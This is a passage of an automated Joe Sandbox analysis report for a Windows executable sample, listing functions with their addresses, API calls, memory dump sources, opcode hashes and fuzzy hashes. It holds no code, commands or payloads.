                                                                                • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                • Instruction ID: 7efe8acff4a1233c34a2d5fe587a70727923a58063bdfd23e7046c5f3a8a8ea1
                                                                                • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                • Instruction Fuzzy Hash: 2DF06229F3858782F7108720E4ACB762251FFE4F09F885030E54ED5996DF2CE949C700
                                                                                Function 00007FF65594AE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DialogDispatchPeekTranslate
                                                                                • String ID:
                                                                                • API String ID: 1266772231-0
                                                                                • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                • Instruction ID: c08453c097b06bb08207ed9dc1793f72972742a35b367fc6cff71e6773c44190
                                                                                • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                • Instruction Fuzzy Hash: FDF0EC29B3858282FB509B20E9A9A362361BFD0F09F885435E55E96855DF2CE908CB01
                                                                                Function 00007FF6559491E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                • String ID: EDIT
                                                                                • API String ID: 4243998846-3080729518
                                                                                • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                • Instruction ID: 0fe9bf8899dd0480aaa2056ffa1ad84b0dd5be788b51534c3f98a7dea920b08d
                                                                                • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                • Instruction Fuzzy Hash: 11013B65B147C3C1FA309751E8287B56350BF99F48F4C1035C95D9A656DF2CED498740
                                                                                Function 00007FF655932CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3838 7ff655932ce0-7ff655932d0a 3839 7ff655932d0c-7ff655932d0e 3838->3839 3840 7ff655932d13-7ff655932d1b 3838->3840 3841 7ff655932ea9-7ff655932ec4 call 7ff655952320 3839->3841 3842 7ff655932d1d-7ff655932d28 GetStdHandle 3840->3842 3843 7ff655932d2b 3840->3843 3842->3843 3845 7ff655932d31-7ff655932d3d 3843->3845 3847 7ff655932d86-7ff655932da2 WriteFile 3845->3847 3848 7ff655932d3f-7ff655932d44 3845->3848 3851 7ff655932da6-7ff655932da9 3847->3851 3849 7ff655932d46-7ff655932d7a WriteFile 3848->3849 3850 7ff655932daf-7ff655932db3 3848->3850 3849->3851 3852 7ff655932d7c-7ff655932d82 3849->3852 3853 7ff655932ea2-7ff655932ea6 3850->3853 3854 7ff655932db9-7ff655932dbd 3850->3854 3851->3850 3851->3853 3852->3849 3855 7ff655932d84 3852->3855 3853->3841 3854->3853 3856 7ff655932dc3-7ff655932dd8 call 7ff65592b4f8 3854->3856 3855->3851 3859 7ff655932dda-7ff655932de1 3856->3859 3860 7ff655932e1e-7ff655932e6d call 7ff65595797c call 7ff65592129c call 7ff65592bca8 3856->3860 3859->3845 3862 7ff655932de7-7ff655932de9 3859->3862 3860->3853 3871 7ff655932e6f-7ff655932e86 3860->3871 3862->3845 3864 7ff655932def-7ff655932e19 3862->3864 3864->3845 3872 7ff655932e88-7ff655932e9b 3871->3872 3873 7ff655932e9d call 7ff65595220c 3871->3873 3872->3873 3874 7ff655932ec5-7ff655932ecb call 7ff655957904 3872->3874 3873->3853
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$Handle
                                                                                • String ID:
                                                                                • API String ID: 4209713984-0
                                                                                • Opcode ID: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                • Instruction ID: ca28d5a30d76aa40f9223a9fe8c98ffa380f9448ef860dcfb0aaf9e99ad166d6
                                                                                • Opcode Fuzzy Hash: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                • Instruction Fuzzy Hash: B051086AA196C282EE10CB65D44877A6350FF44F98F580131EA1E96A92DF3CEC89C340
                                                                                Function 00007FF6559503E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                • String ID:
                                                                                • API String ID: 3750147219-0
                                                                                • Opcode ID: deaa3fd9212449262d54ddd00df38e066acfc98fdf544c89e7b1965c67d44595
                                                                                • Instruction ID: b362aab1fd884c46035e7c05d895cb45f22ff6fb745eb83cfc0ae586962f7035
                                                                                • Opcode Fuzzy Hash: deaa3fd9212449262d54ddd00df38e066acfc98fdf544c89e7b1965c67d44595
                                                                                • Instruction Fuzzy Hash: 1651A06AF1469284FF009BA5D8493AD2362BF45F99F480635DA2CA6BD7DF6CE851C300
                                                                                Function 00007FF655933684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2359106489-0
                                                                                • Opcode ID: 698fab9aec9050558ccefc1a665aee4a6282d07cda4dc8d84b776e202d03389b
                                                                                • Instruction ID: 680db2c49c833551cc8403a5cddc86ceb25b77b9ec716ddd6d2bb875b72936e2
                                                                                • Opcode Fuzzy Hash: 698fab9aec9050558ccefc1a665aee4a6282d07cda4dc8d84b776e202d03389b
                                                                                • Instruction Fuzzy Hash: DD31C76AA5C6C281EA209B29944D1796391FF84F98F5D0231EE9ED2796DF3CDC45C200
                                                                                Function 00007FF655952D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 1452418845-0
                                                                                • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                • Instruction ID: 3fe1d729a1c84be5b1f9e38a03e75773f2933b06b2a559d4dc45464eca0bd477
                                                                                • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                • Instruction Fuzzy Hash: 4F310C29A0D2C241FE54ABA4A45D3B953919F41F4EF4C1434EA4EFB6D3DF2CAC288291
                                                                                Function 00007FF655932320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                • String ID:
                                                                                • API String ID: 2244327787-0
                                                                                • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                • Instruction ID: 6eefc07f3e3139b0e5378ad05a6e95b5e9504f21b0201f20d3abbb866b5c8175
                                                                                • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                • Instruction Fuzzy Hash: D5219229A0C6D2C1EE605B91A408379A3A0FB45F9CF1D4530DA5DE668ACF7CDC858751
                                                                                Function 00007FF65593E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF65593ECD8: ResetEvent.KERNEL32 ref: 00007FF65593ECF1
                                                                                  • Part of subcall function 00007FF65593ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF65593ED07
                                                                                • ReleaseSemaphore.KERNEL32 ref: 00007FF65593E974
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00007FF65593E993
                                                                                • DeleteCriticalSection.KERNEL32 ref: 00007FF65593E9AA
                                                                                • CloseHandle.KERNEL32 ref: 00007FF65593E9B7
                                                                                  • Part of subcall function 00007FF65593EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA63
                                                                                  • Part of subcall function 00007FF65593EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA6E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2143293610-0
                                                                                • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                • Instruction ID: 598afac925e4bc62a718a7a5b6fd41223d02f646003f0522d963ba5c1544245c
                                                                                • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                • Instruction Fuzzy Hash: 5101213AA14A81D3E6449B21D5482AD6360FB84B84F044035DB5DA3666CF3DE8B88780
                                                                                Function 00007FF65593EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CreatePriority
                                                                                • String ID: CreateThread failed
                                                                                • API String ID: 2610526550-3849766595
                                                                                • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                • Instruction ID: 4657660e10cb2e9476378d9effe649004b02a5a768ea67cda42cefaf0fb8ff56
                                                                                • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                • Instruction Fuzzy Hash: 74118239A08B82C1E701DB11E8492A97375FB84F9CF5C4135D64DA266ADF7CED45C740
                                                                                Function 00007FF65594946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryInitializeMallocSystem
                                                                                • String ID: riched20.dll
                                                                                • API String ID: 174490985-3360196438
                                                                                • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                • Instruction ID: ddefe312c4186673cb947d390c5512c8fe8be86ede68ce1df862f807e7eda0b9
                                                                                • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                • Instruction Fuzzy Hash: B0F04F79618B8182EB009F60F45816EB3A0FF88B58F480135E98E92B55DF7CE95DCB01
                                                                                Function 00007FF65594095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF65594853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF65594856C
                                                                                  • Part of subcall function 00007FF65593AAE0: LoadStringW.USER32 ref: 00007FF65593AB67
                                                                                  • Part of subcall function 00007FF65593AAE0: LoadStringW.USER32 ref: 00007FF65593AB80
                                                                                  • Part of subcall function 00007FF655921FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF655921FFB
                                                                                  • Part of subcall function 00007FF65592129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF655921396
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6559501BB
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6559501C1
                                                                                • SendDlgItemMessageW.USER32 ref: 00007FF6559501F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                • String ID:
                                                                                • API String ID: 3106221260-0
                                                                                • Opcode ID: c8c725f194d89cb694611800f0512653aa46f8b12d1072cbf624302cefc19c22
                                                                                • Instruction ID: 7f0d5be081310b113bc31bfbd1814b851f315816433de87d4952ea0a4d2fb2ad
                                                                                • Opcode Fuzzy Hash: c8c725f194d89cb694611800f0512653aa46f8b12d1072cbf624302cefc19c22
                                                                                • Instruction Fuzzy Hash: BA51806AF0468296EB109BA5D4592FD2362AF85FCCF480135DA5DA7B97DF2CE910C340
                                                                                Function 00007FF655949F4C Relevance: 4.6, APIs: 3, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                • String ID:
                                                                                • API String ID: 2032784890-0
                                                                                • Opcode ID: f9448e0b68df36b9487d5351744c9b4894508c737912ea06c90b0eaa0ce2f209
                                                                                • Instruction ID: 9e20a6a7ce81743154842ca7fde4a69b0b60053851f249c26c0f3ca1f118bf75
                                                                                • Opcode Fuzzy Hash: f9448e0b68df36b9487d5351744c9b4894508c737912ea06c90b0eaa0ce2f209
                                                                                • Instruction Fuzzy Hash: B2615C7AA18B81C9EB00CF65D8982BC2362FB45B9CF444535DA5CA3B9ADF3DD955C300
                                                                                Function 00007FF655921744 Relevance: 4.6, APIs: 3, Instructions: 118COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2371198981-0
                                                                                • Opcode ID: 2ac6193bc92ebe9b0342aa47cdff181e1f31bba5b042808f957b0d7448b23de4
                                                                                • Instruction ID: dbd15fcdc4e6deb7f92fcd80c93c18fa3e2e55029f55b18e7e0a5110bfa141cb
                                                                                • Opcode Fuzzy Hash: 2ac6193bc92ebe9b0342aa47cdff181e1f31bba5b042808f957b0d7448b23de4
                                                                                • Instruction Fuzzy Hash: A6411369B086C581EA049B12E98827DA355EF44FE8F584231DE7C97BD6EF3CE4A58304
                                                                                Function 00007FF655932134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2272807158-0
                                                                                • Opcode ID: 0c3154c3ea30730f01a4f8c09a6becc7efe45a6579d5a839052cc1f3b70dbf60
                                                                                • Instruction ID: 7aa6bd3593677840cd66df98626437d4aa9375b515875341fb1a7e2197eb1c67
                                                                                • Opcode Fuzzy Hash: 0c3154c3ea30730f01a4f8c09a6becc7efe45a6579d5a839052cc1f3b70dbf60
                                                                                • Instruction Fuzzy Hash: C441C476A187C182EB148B55E54826DA3A1FB84FB8F185734DFAD53AD6CF3CE8908700
                                                                                Function 00007FF6559223F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
